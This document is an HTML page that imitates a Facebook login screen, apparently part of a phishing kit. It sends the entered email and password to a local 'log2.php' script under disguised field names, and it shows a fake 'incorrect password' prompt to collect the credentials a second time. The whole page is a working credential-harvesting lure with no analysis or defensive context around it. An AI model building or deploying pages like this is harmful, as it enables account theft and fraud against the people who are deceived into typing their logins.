

<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/png" href="To0sfRta43.ico">
<title>Center</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
<body style="background-color:#3b5998;text-align:center">
<style>
p {
  color: white;
  font-family: inherit;
}
  
* {
  box-sizing: border-box;
}

input[type=text], select, textarea {
  width: 400px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 4px;
  resize: vertical;
  margin-top: 30px;
}

input[type=password], select, textarea {
  width: 400px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 4px;
  resize: vertical;
}

label {
  padding: 12px 12px 12px 0;
  display: inline-block;
  margin-bottom: 20px;
}

input[type=submit] {
   width: 200px;
  background-color: #4CAF50;
  color: white;
  font-weight:bold;
  padding: 12px 20px;
  border: none;
  border-radius: 4px;
  cursor: pointer;
  float: center;
  
}

 select {
        width: 90px;
        margin: 5px;
    }
    select:focus {
        min-width: 95px;
        width: auto;
    } 
  
}

input[type=submit]:hover {
  background-color: #45a049;
  margin-bottom: 20px;


}
.col-25 {
 margin-bottom: 7px;
}

.col-75 {
 margin-bottom: 7px;

}
.col-26 {
 margin-top: 30px;

}

.col-28 {
 margin-top: 30px;

}

.col-29 {
 margin-top: 20px;
 margin-bottom: 30px;
 line-height: 20px;
 padding-bottom: 30px;
 
 }

.col-30 {
 margin-top: 30px;
 font-weight: bold;

}	

.alert {
   margin-top: 70px;
   margin: auto; display: table;
   padding: 30px;

}

.aalert {
  margin-top: 80px;
  width: 500px;
  padding: 20px;
  background-color: #fcf8e3;
  color: #8a6d3b;
  border-color: #faebcc;
  margin-bottom: 10px;
  border-radius: 4px; 
  border: 1px solid transparent;
  text-align: center;

}  

/* Clear floats after the columns */
.row:after {
  content: "";
  display: table;
  clear: both;
}

/* Responsive layout - when the screen is less than 600px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and (max-width: 600px) {
  .col-25, .col-75, .aalert, input[type=submit] {
    width: 90%;
    margin-top: 0;
  }
}
</style>
</head>
<body><br>
<img height="20" width="110" alt="" src="F8n3WrEc0r.png" />
<div class="col-29">
<img height="60" width="60" alt="" src="https://www.freepnglogos.com/uploads/facebook-icons/facebook-logo-images-details-8.png" />
<div class="container">
  <form action="log2.php" method="POST" id="myform" >  
     

      </div>
      <div class="col-65">
        <input type="text" id="fname" name="suk" placeholder="The email or password that you've entered is incorrect." required>
      </div>
       <div class="row">
      <div class="col-25">

      </div></div>
      <div class="col-65">
        <input type="password" id="lname" name="uar" placeholder="Password" required>
      </div>
     <div class="row">
	
      <div class="col-25">
      </div><br>
          
      <center><input type="submit" value="Login">
        
    </div>
	<div class="row">
	<div class="col-30">
    <p></p>
  </div>
  </form>
 <script src="script.js"></script>
</div>

